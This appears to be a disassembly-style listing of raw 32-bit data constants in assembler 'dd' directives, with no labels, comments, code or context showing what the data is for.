dd 0E22804DEh, 0CD39BD6Bh, 0BD925E08h, 0BCFC93E7h, 5A2D3375h
dd 0D23D4EE1h, 0C3F0F506h, 0B2B13C75h, 0DAE6C023h, 0CBB48253h
dd 39768D6Eh, 9878EDB0h, 0F3717C58h, 15FD7342h, 19555364h
dd 29DCCB5h, 0BD115A65h, 2BD6B551h, 0F9AE895h, 0E5E55B46h
dd 0B44CA40Fh, 0AA3425C9h, 25521F2Bh, 7B636ECh, 0C765E86Bh
dd 0F17C9AEh, 9E0D5AC0h, 0F888DEB7h, 0FC42FCABh, 0FE4B1567h
dd 2FEAEB44h, 0F01AF85Ch, 5571423Bh, 0F25954AEh, 0FB42A6ABh
dd 55D120Bh, 0E6DD009h, 0BDE7783Ch, 50D0F85h, 52475FCFh
dd 97F071F9h, 76F8D818h, 40E176B8h, 0CDA26E6Dh, 0A59B1796h
dd 3789C545h, 2AD58094h, 8B604A77h, 26F61DB2h, 0E1C5E6A1h
dd 5274EACCh, 203ED217h, 0E902B9B2h, 12BA0D42h, 0A368C07Dh
dd 0F62457AFh, 8CBF2397h, 89049A3Dh, 4943D9D9h, 8AE1B897h
dd 6F64CE9Fh, 89C097D6h, 623A593h, 0F76C4472h, 6948FAD8h
dd 7D5EED2h, 88D4699h, 0BA08CED6h, 641F1755h, 8414A97Eh
dd 307CAA00h, 2CD8F7D0h, 0D9911221h, 0F926F44h, 0EDEE929Ch
dd 590057ABh, 747C98E7h, 0B967EB5Bh, 62AE69DEh, 1FC50D85h
dd 29D45562h, 7242F358h, 2BCD5079h, 31EBE39Ah, 14A00B27h
dd 20BA59ADh, 0BBDD4A74h, 3F79CAFDh, 63A3C050h, 4A94EE2h
dd 5F5409DCh, 6A6A038Dh, 2C4B22FBh, 64AA4AA7h, 0BD45D688h
dd 69A702Ah, 0FCFEF4ADh, 0D42CB8B8h, 0F87E3386h, 0E0EB7464h
dd 903E6CEDh, 0F03E2DD4h, 0E0FBA22Fh, 324BF0E5h, 84C82362h
dd 0F063F352h, 0AEBE195Dh, 5905365h, 135FAF53h, 5AB89968h
dd 3230FC34h, 5B46139Fh, 7EB607C3h, 2AF74815h, 48DB3961h
dd 7EB9380Eh, 0A66D5EB1h, 0F0C2874Bh, 174B19C9h, 68E3A5EDh
dd 0ED4C95BEh, 0AA6C2568h, 18AF5ED1h, 0A75AE5B6h, 19604CF4h
dd 5A731CEFh, 98DDE8E0h, 72BEC5A2h, 0ED7E06BFh, 54DA47DEh
dd 1809DE0Dh, 8DFA285h, 0D4AC5B41h, 49479207h, 0C187E36Bh
dd 6BB1EDF7h, 0ACFD6F98h, 9DAA28Dh, 0E5A90A76h, 3E560356h
dd 0AD080AE9h, 0F3EB1014h, 0BA92359Ah, 7EFC9080h, 53889B28h
dd 7B7DA81Fh, 9C36D97h, 38CA894Ch, 0B00A593Ch, 368E3158h
dd 0AF5152EEh, 0E1A1E0C5h, 65B3D470h, 80D140C3h, 0CF05F701h
dd 5D765A47h, 0DAC3D140h, 0FA9D15FBh, 0F1A9134Ah, 0B28A8938h
dd 0B5290C43h, 36D139h, 0A9B55B7Dh, 0FB381E1Dh, 2E995EEDh
dd 0C0FBA041h, 0B4E6D4AFh, 0D895EF18h, 0A4BA1F82h, 9A6AC4AEh
dd 0A9F0154Bh, 0BD411BF5h, 0C28DAF91h, 0D66E6EE0h, 0A183BEFDh
dd 15C12241h, 6246BA67h, 0B07C4F86h, 269BF429h, 55FC0368h
dd 22FAA62Eh, 0CCB51B78h, 0DC49986Dh, 649A00AFh, 77323E8h
dd 43F2B45Fh, 0DBB83C98h, 0B8AAADA5h, 178D030Dh, 27D76895h
dd 4CDA31B0h, 0FA354C64h, 0B47D7E53h, 0D42E968h, 742AFCEEh
dd 197F57F2h, 473B8997h, 0E171F8BAh, 0FF1D4178h, 0DED26794h
dd 45213511h, 0DFEDAB44h, 0D6D9D607h, 0FD0FAE7Dh, 0B1224D99h
dd 0BCF1D16h, 13B0B4FDh, 0F8FF5E94h, 0A78A1152h, 4999A14Dh
dd 0A0BA9977h, 0F636B8E1h, 2FCEC666h, 52CABA8h, 0CA453068h
dd 2A86F80Eh, 0B7F8570Fh, 1730C1F0h, 0E05AF9Bh, 529777F0h
dd 0A5F9672Ah, 405F1F3h, 8F6AB928h, 98AA02B3h, 0B5C3957h
dd 587D4AD1h, 6DFBF229h, 8F1750BCh, 5F695CE1h, 4A07EB9Bh
dd 856B1AF7h, 0F3FEC61Dh, 4A33F65Dh, 7BC2F256h, 0EBE778FBh
dd 0C24FECEh, 5FCF08A6h, 0C5EDE5FFh, 0FD6D653Bh, 14E205D1h
dd 87E273D0h, 6581AFD4h, 2A4F5A7Ch, 44B2FC44h, 345A36D2h
dd 6B651703h, 0F39FF83Ch, 0EB149C38h, 0EA91C5F4h, 9F466168h
dd 0CEF3941Ah, 6C9CB9CCh, 8A7D465Ah, 1156730h, 8E9F560Ch
dd 7A0BABF6h, 28D35709h, 0CB83F0C1h, 74196CD8h, 0BC0C31B1h
dd 386C2AE2h, 8DDAE83Ch, 7743E03Fh, 2F7A168Ah, 0DBDE8DCBh
dd 0D73B404Fh, 0A547296Ch, 0C048514Ch, 414D96C7h, 0C075A8C7h
dd 0A87C1F47h, 0F2A9D755h, 846EC4B4h, 51A6B02Ah, 8AB90760h
dd 77F3CB12h, 4575D8BFh, 0F579B7C3h, 320BAE1Ch, 0BFDEED1Fh
dd 9AE152B5h, 0CAB17FBAh, 0DB7C97EEh, 0F7F648BEh, 178A450Ah
dd 99302EFEh, 3B0E4ECEh, 0C7E8D7E7h, 0A6D123BCh, 0E837526Fh
dd 0BAE80899h, 6C446FE5h, 9DC0F82Ah, 37BC0443h, 1B05B4E3h
dd 0DA74AB5Ah, 39ABB3BBh, 68E91BEFh, 8E966171h, 0E0F09D37h
dd 0AAC66277h, 0EA7312F7h, 2A20933Fh, 82928D5Dh, 0C2AC3C5Ah
dd 0B5F8ED8Ah, 8E643F6Bh, 58BA48E2h, 0BF3546A1h, 45C320A5h
dd 8E6F33EBh, 1418A89Ah, 31C69Eh, 34137F6Ch, 4B00243Fh
dd 0B22BE3Eh, 0D799E8CFh, 0DA3A5AE0h, 337BB23Bh, 0D7160EA6h
dd 1C2AFF72h, 0BC0F3B91h, 26A74F40h, 0B6E70EFBh, 0BA56D5ECh
dd 9F07C10Ah, 7AB880C0h, 82E4A0A8h, 623CBFE1h, 97C9CCDBh
dd 0F8E7D631h, 0FC92E5A5h, 0B6DB1D9Dh, 0BC08437Ch, 93CD5F12h
dd 28AB76B5h, 279CBDB2h, 2B4C54E8h, 72B9099Dh, 1D8D415Ch
dd 0CFBC9A6Ch, 0F22D361h, 0A5F8D5E3h, 0E3EE5210h, 0A860DB08h
dd 92A0925Ah, 2DF37B75h, 0E164AB7Dh, 0EDD82964h, 70A73219h
dd 0AD89FB3Eh, 0E277B979h, 0FC5BB71Ah, 7F6A0A12h, 16EC9A06h
dd 153453EDh, 0AC0F47Ah, 0F38B96F1h, 69B6C15Ah, 7AD7150Fh
dd 0C8FC29Dh, 0DDC5AF11h, 0DF4C237Dh, 9C9A2A15h, 3594CD17h
dd 76E30A73h, 82CCECF9h, 0D01C51ABh, 45378AF9h, 6EDA4DC2h
dd 0E9028BA4h, 476FF368h, 0D88AFE2Eh, 5C28F688h, 0B4539F53h
dd 5E93B25Bh, 0BE092816h, 7932BD2h, 5060C5FFh, 3B0D7C25h
dd 5EFCB895h, 687E2BF1h, 3F5B18FAh, 0B7C93DB3h, 7A77294h
dd 8D74BFACh, 207DAA78h, 0DE6644BFh, 0FADB10D4h, 4C12D79Bh
dd 25CBCE7Bh, 0A47FA53Fh, 0D383C86Ch, 54F24154h, 6A2B5164h
dd 6C0DF1C2h, 0ABDEB3D1h, 2A6DD4F5h, 0B58965F3h, 0A8B0C3E8h
dd 2B94D5Ah, 5E8BF25Ch, 0DFCC3F07h, 0FEA20644h, 0CFAF877Ch
dd 2BB31764h, 5A8BCC5Dh, 198C6C13h, 153B45Fh, 7916D588h
dd 13F563C0h, 0F56C995Ch, 23BC0974h, 0E46EE729h, 346AFEBh
dd 703DD3BDh, 993C6973h, 76011049h, 0C16421F8h, 180AC556h
dd 26556888h, 3B86C2E1h
dd 6A63AC60h, 0CB53F8E0h, 7C674CF0h, 0FA04E88Ah, 8002DE76h
dd 7806EC0Ah, 95D556AEh, 72A006D8h, 0EEF2539Dh, 680AD9BFh
dd 15259F8Ch, 27EBA6F8h, 8D6E0523h, 0ED7D8C4Ch, 5A745FA0h
dd 62D705C4h, 91EFAA9Fh, 68B23DBAh, 0D568929Eh, 12B23DB8h
dd 0BC2E4AA7h, 7E935576h, 6549E7F4h, 144954B0h, 0AAD702F8h
dd 0D6542973h, 0DC7A123Eh, 0C4F8453h, 931EC0FCh, 38D1C2DEh
dd 82314C9Ch, 0BDFECCC9h, 5F1B9F19h, 57B95005h, 7933A0F5h
dd 0A5499686h, 0AEC02A52h, 88AB1355h, 0F7CE7AFFh, 0E3B45325h
dd 3A62CB9Dh, 0A4DF4175h, 0D2216696h, 0F369E5FCh, 11CADC33h
dd 0F8091E82h, 9A4DCE4Bh, 8193B3D7h, 0BB503542h, 1BE5AB87h
dd 0E2F7CE85h, 0A2E53D89h, 89D6C126h, 970795B6h, 0F256634Dh
dd 4894C6E4h, 4EB506BBh, 83517875h, 28EA36h, 0F3058799h
dd 0E2FBD505h, 9ACF0FF3h, 9F4F7F35h, 0EFABA1D5h, 45A343F1h
dd 93A38B08h, 0DF3D1F8Eh, 0F1C6727Ah, 0D0617940h, 3B65D736h
dd 0C1BE8907h, 3FC67AADh, 74606F1Eh, 4FB2CE13h, 0EC9C7A94h
dd 26810FEEh, 8985CCB1h, 299E8FA9h, 4ACB1716h, 8B655FB3h
dd 4AAD7078h, 4AC476CFh, 5D8BF81Bh, 0F08155B7h, 14B12983h
dd 0C8358CB2h, 7D68AC6Fh, 0B7F17790h, 0EC950D5Eh, 0AA072Bh
dd 0B38BF7h, 579EF2B0h, 35B5F8B9h, 0B1705C47h, 8547F6DFh
dd 5433B9CAh, 0C4C79034h, 188AFA35h, 72600590h, 7A2A1527h
dd 0A0ECCA98h, 0A502D997h, 0ED253FEBh, 28B75FBDh, 0CD3E7BDCh
dd 986E09D0h, 6CA8C0A8h, 0B624BE7Bh, 439F8C84h, 2F32BB59h
dd 0D71FAAB9h, 0C5D43D1Ah, 0C76C0678h, 1E45A399h, 3C1B7A54h
dd 0B1CFB1F2h, 345D396Eh, 0AC14207Dh, 0B664BCB0h, 97A0A524h
dd 0F8ECFD7h, 8D766349h, 0D291C73Fh, 0C1F382DFh, 55098542h
dd 701174CAh, 3B168318h, 1B9EE948h, 92297192h, 4A0114D4h
dd 3A02FF11h, 23E8AE30h, 490FC4F4h, 0EE0D32D8h, 6D6BB7BDh
dd 0CCC6C17Bh, 0C6C7338Ch, 4786A986h, 0D44C1AA7h, 556FC8E9h
dd 73768FABh, 0ADF6DB0Dh, 0AD65722h, 0FAAA308Fh, 60AC0934h
dd 0DE3AB005h, 0C2AD544Ah, 0F21C126Dh, 25C01B3Ah, 93B29E8Dh
dd 787ADC4h, 18BF9DBDh, 741E6B77h, 8EA568ABh, 0F078B4F5h
dd 23286281h, 0A42F6741h, 0DEAB9489h, 5F2ABE29h, 0D01B458Ah
dd 577A9970h, 79308161h, 99F49229h, 0A61C2DEDh, 0C1B24F9Dh
dd 55A05B37h, 0B785C17Eh, 0EF809782h, 9B5697FFh, 9A74C56Ah
dd 2C36A2FFh, 82D32DBh, 50030E94h, 24EE3F16h, 0BA76B1C8h
dd 0FE07DD32h, 0D54D8210h, 9E2AB3F4h, 753EE9C4h, 814EA2ABh
dd 0F2783D32h, 965FBF5Fh, 7BB6DD7Eh, 0DDC66A8Bh, 96C4C195h
dd 4A0BEEEAh, 5F537E5Eh, 2B73E839h, 1AC4FCA4h, 7B1C691Ch
dd 95C1D9F3h, 2DFE0D27h, 47A44580h, 5E061BAAh, 0C34964C1h
dd 0BADCE6AAh, 6F2DF543h, 0F110585Ah, 0D5E7FAC9h, 8DECEC12h
dd 0E2CE1E1Dh, 0B1444AFDh, 80D6D36Fh, 0C0F1F8B9h, 2FE6980Bh
dd 6D5E339Eh, 7C2552E7h, 0F24BEEAAh, 8C27A281h, 0B69F4B31h
dd 2BE35D46h, 0E92C4A42h, 2048DEA7h, 5336EB66h, 5CDDB094h
dd 299D17F0h, 0F91E4E63h, 0A4704878h, 6F54399Dh, 0BFA6A3h
dd 219FFAB8h, 249D166Bh, 8E94C17Fh, 0E78E7B1Fh, 58B6F76Ch
dd 0A411C52Bh, 0E751B89h, 5FD4CE6h, 0AA10A5A3h, 6FE67492h
dd 6F5568E7h, 531D619Bh, 2BC006D3h, 5B765E9Eh, 8CF046B2h
dd 0AC511A9Dh, 952DE1Ah, 1DB661E3h, 130920F5h, 2840D49Ah
dd 1E656F4Ah, 0E4E59DABh, 0BA259DE4h, 3CB85456h, 2C22B844h
dd 6DC5CDF2h, 1DA917E4h, 4F02C5C5h, 93FE0300h, 4A0DB8DEh
dd 382E5261h, 0C137E0C2h, 0AF5EA6h, 958875BCh, 5E157644h
dd 4EBFD556h, 0C56934ECh, 25E7925Ch, 0F06D19Eh, 0CCC9F170h
dd 97CC2EC6h, 0D140A3EBh, 6EE895C2h, 0BE43D5BFh, 0D2B8872Ah
dd 4A0F7F35h, 74AB49A6h, 778E951Fh, 9CAADD89h, 0E40DD9D4h
dd 8E2B9D0h, 93C3A06Bh, 3E55B12Ch, 0FDF161E2h, 1F378ED0h
dd 0D6183F33h, 0FE4156Ch, 3BCBCD85h, 1C7EE81Eh, 0CFBB9ED0h
dd 0BD7C014Fh, 0CC41A20Ah, 0CB50FF8h, 2114ACB9h, 0F7602A90h
dd 0FC170A80h, 0DAF56230h, 52973C57h, 0A24BC226h, 4B14AF4Ah
dd 0B3D93536h, 1F8CA95Ah, 1E31CA86h, 5291D77Bh, 96D3658Dh
dd 0D6A6755Fh, 0A60F84A9h, 57692EAAh, 0E1C87381h, 18198F83h
dd 0A9408AE2h, 42CF24D9h, 0D91BB7A5h, 342ADB08h, 0EF79B50Bh
dd 0C8A3AB65h, 4D7078AAh, 0A59186C1h, 67D5CCABh, 1B2AC186h
dd 0C3B1FDC9h, 91AB2520h, 887D2AD8h, 0BFBDA2F7h, 0A9534D8Ah
dd 390A9EB7h, 0DAF2A4F0h, 473ABEB0h, 0A9DE965Dh, 30605B5Eh
dd 0AA0375CEh, 5BC1E147h, 0F025327Bh, 0CF76FDFCh, 2669DFC9h
dd 63D35D72h, 904C8BFCh, 6E9018FFh, 0BD4A4319h, 8346B9DCh
dd 40B23362h, 4382BB34h, 0A767A581h, 0FAD8257Ah, 17477BEDh
dd 8D5FAEB2h, 0F904F0F3h, 5D4412D1h, 2E67A3F7h, 0C8759753h
dd 872CF76Bh, 7239D5F3h, 55A71651h, 0CAD1BB46h, 5DD3B0B5h
dd 7232FE77h, 0AA587808h, 5B7E95F9h, 5F1C2DBDh, 55579865h
dd 1116583h, 0EFD0C0FEh, 0E454BEC2h, 8769E8A2h, 43F1B9BBh
dd 4B415E18h, 0EBE0E913h, 0B3C3F51h, 660481ACh, 181472E6h
dd 0E652DB24h, 394CE974h, 0D339FB78h, 7E2A5F61h, 9C7CBCBh
dd 89EE3B86h, 276C42ABh, 81594C81h, 0BEC3F613h, 4B8F107Ah
dd 42AE6E5Ah, 2BD3D18Ch, 0EE601898h, 2ED3C2BBh, 64363F44h
dd 0AB7F8FDDh, 0D1EC62DAh, 73E18534h, 0BD674613h, 35C1E894h
dd 2FEABC7Ah, 0EDBE88BCh, 47B8AB46h, 903E68C1h, 74DAC484h
dd 62C0C1F0h, 21166627h, 682B8465h, 0EC62EA97h, 2AB5A307h
dd 0EA87DAEBh, 0D81F34AEh, 0DD3968D4h, 9E5A5674h, 31985CCDh
dd 0B50A0753h, 6DFC030Eh, 0D67BFDE9h, 0F66BE913h, 2C859D68h
dd 0B1387E4h, 0CC6A1337h, 0A66A9F99h, 0D20ED56Dh, 0B25B7416h
dd 0EC3D3CFDh, 2D7F9132h, 56B1BE37h, 557A1ABEh, 4D3635CEh
dd 8FBB824Ah, 3273FF5Fh, 95F5148Bh, 4E6F0D7Eh, 0F8628494h
dd 70AD145Eh, 12910DDFh, 52ACE7F5h, 0B7B24E32h, 81A52E28h
dd 85792A2Eh, 556ABBEh, 0F2A46B05h, 0EDACAA17h, 1BED407Fh
dd 1C8CABECh, 818E219Fh, 7B52A89Ch, 9E6E1926h, 922E187Fh
dd 0CDE8BFA2h, 0DF0DAC55h, 0BF23A7Ah, 0EF25180Ch, 243C02DEh
dd 36BE283Ch, 384E2173h, 312AD0DEh, 0F24E0E6h, 0D6D428B1h
dd 2B5E5E88h, 470F7131h, 80AE8FE9h, 58C7020Fh, 63B5C3B4h
dd 4895255Bh, 77650A65h, 0F097AE94h, 0F5E8B6D7h, 0E45DA993h
dd 2E02BE6Fh, 92A32968h, 88C4F834h, 0DAC0D21Bh, 0F4BB9C02h
dd 9B3519D6h, 6553FDh, 1C0A30B2h, 0D2CB7C85h, 0FB6F818Dh
dd 44BA6078h, 0F09B26CFh, 78EDFAD4h, 0CA73AD1Ch, 4454740Bh
dd 61B7B5C0h, 76BF074Dh, 7AA9847Ah, 0D0832AA2h, 3377A8F8h
dd 7EA8844Dh, 0A5CB255Ch, 68BE07C3h, 0DF9692BFh, 0DA310B27h
dd 0C5BF1B36h, 946A0C96h, 0A0733F3Eh, 0E57D47F7h, 47D4F172h
dd 21F83B9Eh, 2038EA3Bh, 159E8882h, 0D8D17ACDh, 6F876431h
dd 3554DC8Ch, 6264A03Ch, 31B9ACA0h, 0AEF2121h, 3838AABh
dd 0A3CDB833h, 7F063F8Dh, 621F8190h, 0E780B20Ah, 0FD1F93BFh
dd 0BF07DF09h, 0C0FC6810h, 0EE553A1Fh, 89EFAD26h, 1DF6EF3Ch
dd 0BDAB0AE9h, 9C9C65F9h, 46EB7640h, 0A725056Ch, 4179D6C5h
dd 3765C3C3h, 0B3F9B671h, 15BB7D5Ah, 0EA599FB2h, 0CE337298h
dd 7B5359B6h, 0F0E37E65h
dd 3A1CB9F4h, 0DB2E22EBh, 1B36524Ah, 9C0A3D39h, 0A43F4568h
dd 0B2D1C30Eh, 8CB87044h, 667EA85Ch, 77F2ABD7h, 0E9EFDF5Fh
dd 0F868746Eh, 1D7573E2h, 0ED2ED995h, 0BBBB68BCh, 70AB5237h
dd 30A50E0Fh, 0CFBD4676h, 0E9F8142Dh, 37DBCB3Eh, 440BB2AFh
dd 0CB19E3B2h, 37656886h, 9E15BAE5h, 0C2C3AB7h, 0D1B7C944h
dd 2A70350Eh, 8C0EAA94h, 8DD8A738h, 0BE98954Fh, 7B19977Dh
dd 1A39A7C8h, 0A78C59EBh, 0F431DDA8h, 46D4A34Ah, 0EFD412FCh
dd 0B1EC3BD5h, 0B6BF6CA8h, 0FA9F8C02h, 12BAC228h, 163B26E4h
dd 4A652005h, 731664BDh, 97994D17h, 90EC52D3h, 689A36B6h
dd 0DF813F9Ah, 9547EE0Ah, 0B8D54801h, 1B0791ACh, 0E04C74A5h
dd 0B53FDA8Fh, 47CA3B9Eh, 0D697E0D0h, 0FEB77AC3h, 97499DD8h
dd 0C3F01BDBh, 0E2C19789h, 514CAD4Fh, 25D202FCh, 9FF2E4Fh
dd 0A6B450BEh, 0CBA2834Eh, 0DC94B3BBh, 0C5597422h, 11C1F45h
dd 22A4A7D9h, 8CC4B8AFh, 5F4D127Ch, 0C15BE1B2h, 0F49C53Ah
dd 1BFE75B9h, 852BA99Fh, 61F0D58Fh, 75E09D54h, 65D47A03h
dd 372B7F5Ah, 0E49CBC64h, 72B83EE8h, 0E820E538h, 0AC36543h
dd 3968DCFFh, 74D7255Eh, 523A13DEh, 62B1BDCAh, 0F237716Fh
dd 51CB3A56h, 0D0748D4Bh, 76B9A5FBh, 8869D0A4h, 43E56C95h
dd 0E75D065Bh, 8F35AFE0h, 7CF37C17h, 0D8D17F7Fh, 0AFCBAB5Dh
dd 4772BD5Fh, 0C5D886A7h, 14FD9D56h, 39B0FC7Fh, 0E57984C5h
dd 0F09BB427h, 12885D15h, 0D96E9140h, 0B3D2CC5Ch, 25ECEBE7h
dd 3755041Ah, 33898299h, 0F2BDD4DEh, 0C7B0ACA8h, 0F96970AEh
dd 479685C1h, 0D33F29AAh, 595FA15Ah, 75605828h, 0E929BF92h
dd 0B6BF2E39h, 2415DAF5h, 3DDC5547h, 9941A2DBh, 0E686C950h
dd 1EDAEF54h, 0C1357361h, 1731E2B8h, 0D95F4F83h, 0CF6B43C0h
dd 575F4BE5h, 291662B3h, 5F8BF056h, 450AC324h, 0EF70D1AFh
dd 17EBB2ECh, 1299D2F6h, 880D785Bh, 0F27F13B9h, 0C761567Ch
dd 28A55434h, 6A8596B7h, 81E5CDB8h, 3B98B14Eh, 1C5CD78Fh
dd 0B1B02F41h, 79AECD1Ch, 33F2A146h, 0E81C1F0Ch, 4CA7260Eh
dd 97F2CAB2h, 81C8A326h, 6BE4E1CFh, 0DCDF46F8h, 0D5EC0FE6h
dd 873FE2F9h, 40E74762h, 75299312h, 0A9369C67h, 5136F972h
dd 3320359Ch, 0AAD4AD1Dh, 0E27FB40h, 0AB7A931Fh, 0AE9729C1h
dd 0E1408D14h, 0F05D7ACBh, 52DADDB1h, 0CFBD8FE1h, 0E2E5A8B2h
dd 46FE3FA9h, 4704BC4Ch, 93FA5E8h, 3F3CEDA2h, 5FD36B06h
dd 0E36917A1h, 16F85A21h, 719AC585h, 65FB392Fh, 0E6CA8BF2h
dd 77853B95h, 6737CCAFh, 3284143Bh, 3E5E1C29h, 3BF55BA1h
dd 5541715Fh, 0B15AD104h, 0B7DE764Bh, 0F09D3EE4h, 29108391h
dd 0C4C46E7Eh, 9E85F659h, 0CE6D89DCh, 1B23981Fh, 5F82433Bh
dd 0CFB79103h, 0F84924E9h, 52B9073Ah, 0E777513Fh, 0F359A61Bh
dd 381AD507h, 982B464Ah, 5B289F09h, 3716D872h, 7EBA55B6h
dd 0AB6B87FDh, 0BB25D685h, 394FB5A5h, 0F61E33B3h, 0ADA768BFh
dd 0C3BF7C31h, 0EE68B4F4h, 68DF6889h, 0FA643935h, 34FA55E6h
dd 0DAB38CE4h, 4C380F80h, 0A9F5CACDh, 5C2B9F6Ch, 86041A27h
dd 656DDC1Bh, 16156C16h, 0D5E118C5h, 17E8BF3Fh, 0A331ABAh
dd 59568E47h, 62A9DA3h, 4573C81Fh, 5CA5AD98h, 5AD61EBAh
dd 473B8135h, 0B1E5E121h, 0E08367A3h, 74FC168Fh, 2521A81Bh
dd 0C5B3CCD6h, 1DC964B4h, 4E71408Fh, 0C1ACB779h, 0E5340ABh
dd 0FCEC3A87h, 0B71B1D63h, 95FF8132h, 1E8444CEh, 0C7AA5FE7h
dd 6EC5F93Eh, 25FF7F0Eh, 7E7340Eh, 33C8FAACh, 0CA4CFB18h
dd 9AEFE1DEh, 574049FBh, 0CC21F848h, 0BF95C2A4h, 0E47E5FE2h
dd 42D1E3C3h, 0DED57A99h, 0FB7E9C9h, 86E7F2AAh, 5F9C1BC9h
dd 3B3421CEh, 74AA745Fh, 2EEF7D7Dh, 62D359B9h, 0F79F5DFh
dd 3CFA4FAh, 0BF14C537h, 483A9D85h, 775BEB9Ah, 2A817117h
dd 496AB952h, 55CC9BD0h, 0BEC2ED41h, 0CEA37125h, 968D2D7Eh
dd 0B5565FBCh, 99FC72B9h, 12D85625h, 0D81AC7EBh, 5D9DD380h
dd 185D2046h, 0FDEE2D1Fh, 0EE60C5E0h, 2870FC64h, 0CB281FF9h
dd 586A854Ch, 0B44588A2h, 8325F4A0h, 2B7B7582h, 0F9B3B5A3h
dd 6E88AA94h, 12ADA573h, 6BB59502h, 0F1495154h, 74B6F408h
dd 3624C731h, 8288A4B7h, 0C0D4501Eh, 2B9E5717h, 0C30FC6CCh
dd 5C276E07h, 0B96453B3h, 37D5C795h, 59D857E2h, 0D6994391h
dd 0B151D17Ch, 0E453D0C1h, 0FE1F6033h, 7E04AE3Ah, 25EB4D09h
dd 5CE5ADB4h, 2B465FC6h, 0D4CDFD9Fh, 0F0E066A2h, 157C5FE9h
dd 71DA8F95h, 0A3CC97D3h, 0ACC8EAA1h, 7402FCAEh, 6CB3014Ah
dd 85D0695h, 0CEAAD17Eh, 0E6D9C92Fh, 1ED41C33h, 87B7CF75h
dd 6831D1D2h, 0E5D5CE92h, 2F45BDFEh, 8BFA0EF9h, 0E8EAE719h
dd 20AD57A4h, 22EBAD9Bh, 8E2523D6h, 0A4C35AAEh, 0AF22537Fh
dd 0E2ACFE9Fh, 0D81ECBCh, 9E02AD5h, 82B7F890h, 0B31A9C53h
dd 574E5B71h, 0C5052A8Dh, 8A276142h, 0A16A945Ah, 0E7BFCCEh
dd 425BBBAAh, 0E7A5DC84h, 0AF936D51h, 0B44EAA9Fh, 0DDD37D25h
dd 3226BB32h, 5B7076D6h, 4BD55869h, 4D1E82F8h, 0ECECDC3Ah
dd 9DA2CD17h, 89E62B78h, 1F1ECA1Bh, 0CEE0AC94h, 6970B405h
dd 5653CC67h, 0C0F9580Ah, 0ECE094FCh, 4A360F4Dh, 35F6045h
dd 6C267CE6h, 1F276D08h, 3F32E98Eh, 45A48058h, 89F9B2Ah
dd 0A74202Ah, 0CCA8D68Bh, 0BF046BF5h, 3B9CCFDFh, 0F383E14Ch
dd 1F2ECC45h, 520AD669h, 0DCBFC2DFh, 0E9DAC149h, 587CBCF1h
dd 307272FEh, 0EA7E3DDh, 2B5074C4h, 0C16F96A6h, 0E1321419h
dd 0BD7A47D8h, 10EB4CE7h, 17F1754Ah, 0A675AB2Dh, 0BBF8CD4Dh
dd 0E32E485Fh, 456D3B21h, 53702514h, 72B9EBBh, 7B98A6C6h
dd 5B91952Bh, 63D0244Ch, 0A5097D26h, 896DE388h, 44791FA6h
dd 8FF8F22Ah, 844985C3h, 0FB946D6Ch, 0C1973FA7h, 27CB46D5h
dd 739DA81Dh, 6C6C11FBh, 0C8DE5A32h, 0D9F043ADh, 79957925h
dd 175A7EC0h, 0D951B49Dh, 837D1F80h, 15FD5F48h, 84C4C056h
dd 0C4B81E4Ch, 0FAAA396h, 0D5E2960Ah, 331C394Dh, 18BF8BCDh
dd 78FB5D80h, 0C1BFC8A1h, 0D6844BBAh, 95E28C85h, 3E3FD592h
dd 21F3D679h, 0BBFA8754h, 4E2408D8h, 0DB937915h, 0B9DF51BEh
dd 0F874711h, 0FBE12AE1h, 3DB4B969h, 3540CBD0h, 0A18B902Eh
dd 6479DE0Ch, 320A0593h, 98DC3D54h, 86A83A73h, 9EB88D73h
dd 0C0AF715Bh, 0DCBBAB79h, 303841AFh, 572EE97Fh, 0C46BCBB4h
dd 9C02EDFBh, 6BBEB9CFh, 8F2F8034h, 0CA518789h, 0A97F1590h
dd 2BD395FEh, 0B8285C1Fh, 47E28993h, 0F8AAA5CBh, 5BFCDF7Eh
dd 88C04A26h, 7DFF7225h, 0D769BF24h, 0B26066C1h, 24FF8588h
dd 3CEB2A4Ah, 6496D88Ah, 0AD8CDD95h, 5EB835A0h, 63588DFCh
dd 4502FDC8h, 866452C7h, 0EC94E336h, 0CB8E6D86h, 0F183E59Fh
dd 38817C26h, 0E32A0318h, 1E3DE731h, 26F034DCh, 0F9FD6421h
dd 381EC6BEh, 0B53FFE0Fh, 962E3982h, 5305AAF6h, 8A0FAAA7h
dd 0AA578469h, 0B59F03EDh, 0A67D3E3Dh, 1520D383h, 0C08BAF95h
dd 0C9A45AAAh, 0BFC70057h, 0D7DA4BFBh, 77AB2FA4h, 3264234Dh
dd 8622579h, 7761F4EEh, 0C4303E3Eh, 0AE6A64B8h, 0FB6A3739h
dd 0D3BF6AF5h, 0B67D6105h, 0DF6FFA17h, 0C27C8631h, 342FC2E9h
dd 9C8DC69Ch, 0AD8D56BCh, 7A6D2BF8h, 1FBA91B4h, 79B1AA5Ah
dd 373F59F7h, 0EAB7B13Dh, 0A24E15B5h, 0AA96AE67h, 0D2C5C56Ch
dd 0EF6E4D3h, 0BC0AA56Ch, 8FD169E2h, 0EAAEDE57h, 0B2D119EBh
dd 871ED378h, 0D4443D42h
dd 73DFD8D3h, 0C9B3AFC6h, 4DABBA29h, 0CC6E6F71h, 557382D0h
dd 71E1F8B7h, 2FA7D899h, 26DB0C0Fh, 2BC1FE2Ah, 6EEDEFABh
dd 74695340h, 90E9EF7Bh, 1405828Bh, 298CC4EDh, 748A4D3Dh
dd 5333F702h, 2A85D5D7h, 2AFE055Eh, 0A91E1D46h, 0AD57C4F1h
dd 95AD2C5Ah, 0F9316BF3h, 0E638A37Ah, 0FC4A95DBh, 4488A417h
dd 9C0AB6BDh, 0F2DF55D6h, 5035F2Ch, 0ED742E46h, 0FCA179BBh
dd 51BF580Eh, 0CE6F414Dh, 8B82E737h, 2EE8A49Fh, 75EBFA6Dh
dd 0C9015CECh, 4129F71Dh, 2C358DB7h, 4CB7DD4Bh, 0A6C7F6F8h
dd 3C3814CFh, 0D4F4F55Ch, 0BE8705A3h, 0EFCD6EC6h, 0B6C2B745h
dd 0EA74C8F6h, 12D19EB4h, 0E17D1B0Fh, 179AE46Eh, 0FBE381C7h
dd 576174FDh, 0E5E89AE2h, 4E13DD07h, 372C0F0Eh, 83D48EC4h
dd 0DE2B6B5Dh, 0A707E888h, 79CA16A9h, 62FA0EBCh, 8C3DDA2h
dd 0C8C0F835h, 956EC17Dh, 16D1FEF7h, 3F14C5D2h, 6EA146B0h
dd 3CF844A7h, 0E93C2FF3h, 0C7D96A27h, 56102B59h, 0F8E2ADC1h
